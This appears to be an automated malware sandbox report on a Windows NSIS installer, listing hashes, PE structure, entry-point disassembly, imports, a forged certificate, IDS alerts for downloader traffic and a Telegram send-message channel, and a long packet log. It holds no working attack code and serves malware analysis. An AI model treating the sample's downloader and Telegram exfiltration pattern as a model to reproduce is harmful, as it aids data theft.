                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                  Entropy (8bit):7.955746290711353
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:RmIYOfX0yO.exe
                                                                                                                  File size:789'280 bytes
                                                                                                                  MD5:5e2ff1914fc1f8ebadf282f4096d6fc8
                                                                                                                  SHA1:77d61bdf0ce63eed5324b56623b878fc3dc79890
                                                                                                                  SHA256:f5f3c3a8c7f9f5fb9531fa0d57012ce0869b52b23d05e6c9b7a0220ac917db6d
                                                                                                                  SHA512:e70121837b94ba002dc2093afcebed4ec1d3f90d46d1466fe66e4f0bd16a9426d58547946ef7f420c937017deb650c5705c7792f6047de68918f018b7ec4d916
                                                                                                                  SSDEEP:12288:6DGZKmormA1FvvLR3x8rqDFXlo3KsAYzjDCwonXnWMIk2CyLuuOSFBPpJh/gpcXF:4mor/1t8uTooHNnXWMIdCkOqXPgKP9
                                                                                                                  TLSH:8BF4236262C0D533D9103230C6A9ABF587F1CC96D918DBE73660BC2F79727A5A46B331
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..NP..*_...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....
                                                                                                                  Icon Hash:070b4d61782c178f
                                                                                                                  Entrypoint:0x4033b6
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:7192d3773f389d45ebac3cc67d054a8a
                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=Kombinationslaases, E=Personalebladenes@Imbrications.Ov, O=Kombinationslaases, L=Riekofen, OU="Premaxillae Flonelsbukserne Mindevrdige ", S=Bayern, C=DE
                                                                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                  Error Number:-2146762487
                                                                                                                  Not Before, Not After
                                                                                                                  • 12/03/2024 12:53:56 12/03/2025 12:53:56
                                                                                                                  Subject Chain
                                                                                                                  • CN=Kombinationslaases, E=Personalebladenes@Imbrications.Ov, O=Kombinationslaases, L=Riekofen, OU="Premaxillae Flonelsbukserne Mindevrdige ", S=Bayern, C=DE
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:5915E457C398F149F6C680F86B343D05
                                                                                                                  Thumbprint SHA-1:8D4EA2727C819B72B6D11B906E317D0C3531AEDF
                                                                                                                  Thumbprint SHA-256:ACC0D6257B17FB948D65B08ACC8E7D40A1AEFCFEBC9C059F85001533A98C95CD
                                                                                                                  Serial:3CF9F331A78358B632C8FA61B083465515E8E437
                                                                                                                  Instruction
                                                                                                                  sub esp, 000002D4h
                                                                                                                  push ebp
                                                                                                                  push esi
                                                                                                                  push 00000020h
                                                                                                                  xor ebp, ebp
                                                                                                                  pop esi
                                                                                                                  mov dword ptr [esp+0Ch], ebp
                                                                                                                  push 00008001h
                                                                                                                  mov dword ptr [esp+0Ch], 0040A230h
                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                  call dword ptr [004080B4h]
                                                                                                                  call dword ptr [004080B0h]
                                                                                                                  cmp ax, 00000006h
                                                                                                                  je 00007F204CE78023h
                                                                                                                  push ebp
                                                                                                                  call 00007F204CE7B17Eh
                                                                                                                  cmp eax, ebp
                                                                                                                  je 00007F204CE78019h
                                                                                                                  push 00000C00h
                                                                                                                  call eax
                                                                                                                  push ebx
                                                                                                                  push edi
                                                                                                                  push 0040A3B0h
                                                                                                                  call 00007F204CE7B0FBh
                                                                                                                  push 0040A3A8h
                                                                                                                  call 00007F204CE7B0F1h
                                                                                                                  push 0040A39Ch
                                                                                                                  call 00007F204CE7B0E7h
                                                                                                                  push 00000009h
                                                                                                                  call 00007F204CE7B14Ch
                                                                                                                  push 00000007h
                                                                                                                  call 00007F204CE7B145h
                                                                                                                  mov dword ptr [0042A264h], eax
                                                                                                                  call dword ptr [00408044h]
                                                                                                                  push ebp
                                                                                                                  call dword ptr [004082A8h]
                                                                                                                  mov dword ptr [0042A318h], eax
                                                                                                                  push ebp
                                                                                                                  lea eax, dword ptr [esp+34h]
                                                                                                                  push 000002B4h
                                                                                                                  push eax
                                                                                                                  push ebp
                                                                                                                  push 00421708h
                                                                                                                  call dword ptr [0040818Ch]
                                                                                                                  push 0040A384h
                                                                                                                  push 00429260h
                                                                                                                  call 00007F204CE7AD32h
                                                                                                                  call dword ptr [004080ACh]
                                                                                                                  mov ebx, 00435000h
                                                                                                                  push eax
                                                                                                                  push ebx
                                                                                                                  call 00007F204CE7AD20h
                                                                                                                  push ebp
                                                                                                                  call dword ptr [00408178h]
                                                                                                                  Programming Language:
                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84bc0xa0.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x4f0000x1c5c8.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xc03880x798
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b8.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x615e0x620041c79e199a2175acbe73d4712982d296False0.6625876913265306data6.4557374109402IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x80000x13700x14009cbedf8ff452ddf88e3b9cf6f80372a9False0.4404296875data5.102148788391081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xa0000x203580x60073e3da5d6c2dd1bec8a02d238a90e209False0.5149739583333334data4.09485328769633IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .ndata0x2b0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .rsrc0x4f0000x1c5c80x1c6000e60bf3ace34d6a7de54772dad04b786False0.8734684746696035data7.577852317524115IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_ICON0x4f4180xc9c0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9973280669144982
                                                                                                                  RT_ICON0x5bdd80x5d9cPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.9926556501418795
                                                                                                                  RT_ICON0x61b780x2e8ePNG image data, 256 x 256, 4-bit colormap, non-interlacedEnglishUnited States0.9979023326061419
                                                                                                                  RT_ICON0x64a080x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4182572614107884
                                                                                                                  RT_ICON0x66fb00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.45075046904315197
                                                                                                                  RT_ICON0x680580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304EnglishUnited States0.6625799573560768
                                                                                                                  RT_ICON0x68f000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024EnglishUnited States0.7382671480144405
                                                                                                                  RT_ICON0x697a80x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.6317073170731707
                                                                                                                  RT_ICON0x69e100x568Device independent bitmap graphic, 16 x 32 x 8, image size 256EnglishUnited States0.5505780346820809
                                                                                                                  RT_ICON0x6a3780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6187943262411347
                                                                                                                  RT_ICON0x6a7e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.7002688172043011
                                                                                                                  RT_ICON0x6aac80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.8074324324324325
                                                                                                                  RT_DIALOG0x6abf00x100dataEnglishUnited States0.5234375
                                                                                                                  RT_DIALOG0x6acf00x11cdataEnglishUnited States0.6056338028169014
                                                                                                                  RT_DIALOG0x6ae100xc4dataEnglishUnited States0.5918367346938775
                                                                                                                  RT_DIALOG0x6aed80x60dataEnglishUnited States0.7291666666666666
                                                                                                                  RT_GROUP_ICON0x6af380xaedataEnglishUnited States0.6379310344827587
                                                                                                                  RT_VERSION0x6afe80x29cdataEnglishUnited States0.5089820359281437
                                                                                                                  RT_MANIFEST0x6b2880x33fXML 1.0 document, ASCII text, with very long lines (831), with no line terminatorsEnglishUnited States0.5547533092659447
                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                  USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                  ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States
                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2025-01-10T17:09:09.446890+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1149981142.250.186.78443TCP
                                                                                                                  2025-01-10T17:09:14.955499+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149983158.101.44.24280TCP
                                                                                                                  2025-01-10T17:09:16.346143+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149983158.101.44.24280TCP
                                                                                                                  2025-01-10T17:09:16.958454+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149985104.21.80.1443TCP
                                                                                                                  2025-01-10T17:09:17.539679+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1149986158.101.44.24280TCP
                                                                                                                  2025-01-10T17:09:27.623481+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149997104.21.80.1443TCP
                                                                                                                  2025-01-10T17:09:28.856245+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.1149999104.21.80.1443TCP
                                                                                                                  2025-01-10T17:09:29.775129+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.1150000149.154.167.220443TCP
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 17:09:08.394404888 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:08.394449949 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:08.394539118 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:08.410125017 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:08.410140991 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.068032980 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.068135023 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.068795919 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.068898916 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.123471975 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.123497963 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.123845100 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.123927116 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.127335072 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.175338030 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.446877003 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.446985960 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.447010994 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.447083950 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.447580099 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.447626114 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.447640896 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.447748899 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.463661909 CET49981443192.168.2.11142.250.186.78
                                                                                                                  Jan 10, 2025 17:09:09.463689089 CET44349981142.250.186.78192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.558640003 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:09.558676004 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:09.558764935 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:09.559076071 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:09.559087992 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:10.218740940 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:10.218977928 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:10.223078966 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:10.223092079 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:10.223675013 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:10.227030039 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:10.228339911 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:10.271375895 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.570099115 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.570199013 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.578867912 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.582370996 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.589162111 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.589308023 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.589329958 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.589462042 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.597079992 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.597203016 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.661485910 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.661545038 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.661573887 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.661607981 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.661612988 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.661621094 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.661647081 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.661670923 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.661983967 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.662025928 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.665837049 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.665882111 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.665889978 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.665935993 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.672050953 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.672099113 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.672108889 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.672148943 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.678436995 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.678483963 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.678493023 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.678531885 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.684815884 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.684860945 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.684871912 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.684911013 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.691159964 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.691221952 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.691231966 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.691281080 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.697629929 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.700664043 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.700675964 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.700732946 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.703979969 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.704025984 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.704034090 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.704072952 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.710315943 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.710361958 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.710371017 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.710412025 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.716836929 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.716895103 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.716907024 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.716947079 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.723160982 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.723222971 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.731399059 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.731452942 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.731466055 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.731506109 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754343033 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754410028 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754445076 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754496098 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754503012 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754543066 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754545927 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754559994 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754589081 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754615068 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754616022 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754623890 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.754652023 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.754678965 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.756092072 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.756133080 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.756141901 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.756190062 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.756195068 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.756232023 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.760386944 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.760436058 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.760442972 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.760482073 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.766259909 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.766308069 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.766313076 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.766354084 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.769793034 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.769834042 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.769839048 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.769881964 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.774585009 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.774627924 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.774635077 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.774682999 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.779356003 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.779402018 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.779409885 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.779448986 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.784142971 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.784190893 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.784198046 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.784235001 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.788952112 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.789005995 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.789020061 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.789061069 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.793840885 CET44349982142.250.186.33192.168.2.11
                                                                                                                  Jan 10, 2025 17:09:12.793900013 CET49982443192.168.2.11142.250.186.33
                                                                                                                  Jan 10, 2025 17:09:12.793906927 CET44349982142.250.186.33192.168.2.11
